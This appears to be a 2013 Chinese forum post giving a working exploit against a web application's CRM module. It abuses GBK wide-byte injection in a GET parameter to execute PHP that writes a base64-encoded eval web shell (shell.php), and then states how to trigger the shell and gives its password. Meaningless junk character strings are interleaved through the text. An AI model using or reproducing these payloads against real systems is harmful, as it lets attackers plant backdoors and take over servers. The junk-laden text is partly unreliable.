此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
$ b/ i9 {4 Z3 S; v% ~
; J6 z( }! x, C9 l# z* S, m
e. u( ?! K6 ], ~: z/ GEXP:
0 [5 R3 d2 ?$ a! H5 v8 N1 T. \ / o$ f6 Q* m9 {7 @, V" h
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}+ w# Q9 q' X+ G* R3 z
" p O3 j1 U- c: F. D7 ]
第二步: [GET]http://site/general/email/index.php ^* y4 H" H2 p5 w# \- |$ s
7 C9 ^& u- y/ }8 C7 E# v9 s8 bSHELL: http://site/general/email/shell.php 密码C
: r) r0 L# ]0 i3 ?$ r( x ' X6 g { b1 J" |9 V4 S1 g( i
4 X2 |7 W4 f- D: a+ @$ b; m此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
, {2 m0 i" [+ s& _% z% t9 J
1 m$ D4 @* |" l+ k+ J& V有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
) s' v1 W' c' h
1 L+ y" h8 L% j: `+ m: u! t: W& u
|
发表于 2013-2-4 16:19:29
收藏
支持
反对